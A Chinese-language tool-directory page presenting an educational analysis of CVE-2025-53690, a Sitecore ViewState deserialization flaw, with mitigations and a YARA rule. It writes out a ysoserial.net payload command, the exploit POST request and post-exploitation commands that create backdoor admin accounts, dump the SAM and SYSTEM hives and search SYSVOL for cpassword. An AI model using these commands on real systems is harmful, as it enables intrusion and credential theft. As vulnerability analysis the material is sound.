Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-53690-Analysis — 这是CVE-2025-53690分析文档。 | Kitploit
工具/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
漏洞分析漏洞利用Web应用程序漏洞利用取证分析恶意软件分析渗透测试学习与教育红队事件响应
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

这是CVE-2025-53690分析文档。

查看仓库
341年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-53690: Sitecore ViewState反序列化漏洞分析

概述

CVE-2025-53690 是 Sitecore 产品线中发现的一个 ViewState 反序列化漏洞,通过利用泄露的 ASP.NET machine key 可实现远程代码执行,属于严重安全漏洞。

基本信息

  • CVE ID: CVE-2025-53690
  • CVSS 评分: 9.0 (Critical)
  • 漏洞类型: 不可信数据反序列化 (CWE-502)
  • 发现日期: 2025年9月
  • 公开日期: 2025年9月3日
  • 实际利用: 自2024年12月起作为零日漏洞被利用

受影响产品

  • Sitecore Experience Manager (XM) - 9.0 及以下所有版本
  • Sitecore Experience Platform (XP) - 9.0 及以下所有版本
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Active Directory 模块 1.4 及以下版本

漏洞详细分析

根本原因

该漏洞的核心在于错误的配置管理:

  1. 使用示例 Machine Key:2017 年之前 Sitecore 部署指南中包含的示例 ASP.NET machine key 在生产环境中被原样使用
  2. 静态密钥复用:多个部署中重复使用相同的 machine key
  3. 绕过 ViewState 验证:通过泄露的密钥可绕过 ViewState 完整性验证

ASP.NET ViewState 机制

ViewState 是 ASP.NET 的状态管理功能:

  • 将网页状态存储在 __VIEWSTATE 隐藏字段中
  • 使用 machine key 保证完整性和机密性
  • 服务器反序列化 ViewState 以恢复页面状态
root@kitploit:~
<!-- web.config 示例 -->
<system.web>
    <machineKey 
        validationKey="[64字节密钥]"
        decryptionKey="[48字节密钥]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

攻击向量

1. 识别易受攻击的端点

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
特点:无需认证即可访问,使用 ViewState

2. 生成恶意 ViewState 载荷

攻击者使用已知的 machine key 和 ysoserial.net 生成恶意载荷:

root@kitploit:~
# ysoserial.net 使用示例
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[密钥]" --validationalg="HMACSHA256" --decryptionkey="[密钥]" --decryptionalg="AES"

3. 发送 HTTP 请求

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[恶意载荷]&__VIEWSTATEGENERATOR=[值]

实际攻击案例分析(Mandiant 报告)

攻击生命周期

Phase 1: 初始渗透

  • 端点: /sitecore/blocked.aspx
  • 方法: ViewState 反序列化攻击
  • 权限: NETWORK SERVICE (IIS worker process)
  • 载荷: WEEPSTEEL 侦察工具

Phase 2: 侦察与立足点建立

root@kitploit:~
# 执行的命令
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

部署的工具:

  • 7za.exe: 文件压缩工具
  • lfe.ico: EARTHWORM 网络隧道工具
  • 1.vbs: 命令执行用 VBScript

Phase 3: 权限提升

root@kitploit:~
# 创建本地管理员账户
net user asp$ [密码] /add
net localgroup administrators asp$ /add

net user sawadmin [密码] /add  
net localgroup administrators sawadmin /add

凭据收集:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Phase 4: 持久化

  • RDP 访问: 使用已创建的账户
  • DWAGENT: 安装远程访问工具(以 SYSTEM 权限注册为服务)
  • 账户设置修改:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Phase 5: 内部侦察

root@kitploit:~
# 识别域控制器
nltest /DCLIST:[domain]
nslookup [domain-controller]

# 在 GPO 中搜索 cpassword(组策略首选项攻击)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# 执行 BloodHound/SharpHound
sh.exe -c all

Phase 6: 横向移动

  • 使用窃取的域管理员账户通过 RDP 访问其他系统
  • 通过 EARTHWORM 进行网络隧道绕过安全措施

使用工具分析

WEEPSTEEL(侦察工具)

root@kitploit:~
// 采集的信息
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

输出方式:伪装成 ViewState 以隐藏数据

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES 加密 + base64 编码的输出}" />

EARTHWORM(网络隧道)

  • SOCKS v5 代理服务器功能
  • 绕过防火墙并隐藏流量
  • 通过隧道传输 RDP 流量以逃避检测

DWAGENT(远程访问)

  • 合法的远程管理工具
  • 以 SYSTEM 权限注册为服务
  • 自动启动确保持久化

SHARPHOUND(AD 侦察)

  • 用于 BloodHound 的数据收集工具
  • 映射 Active Directory 环境
  • 识别攻击路径

防御与缓解措施

立即应对措施

root@kitploit:~
<!-- 生成唯一 machine key -->
<machineKey 
    validationKey="[新的_64字节密钥]"
    decryptionKey="[新的_48字节密钥]"
    validation="HMACSHA256" 
    decryption="AES" />

安全增强措施

  1. 自动化密钥轮换
  2. 启用 ViewState MAC 验证
  3. 配置文件加密
  4. 网络分段
  5. 加强监控

检测规则

root@kitploit:~
# YARA 规则示例(检测 WEEPSTEEL)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

结论

CVE-2025-53690 是一个典型示例,展示了简单的配置错误如何导致严重的安全威胁。通过此漏洞,学习者可以体验真实 APT 攻击的完整生命周期,并理解现代攻击技术与防御策略。

参考资料

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
下载工具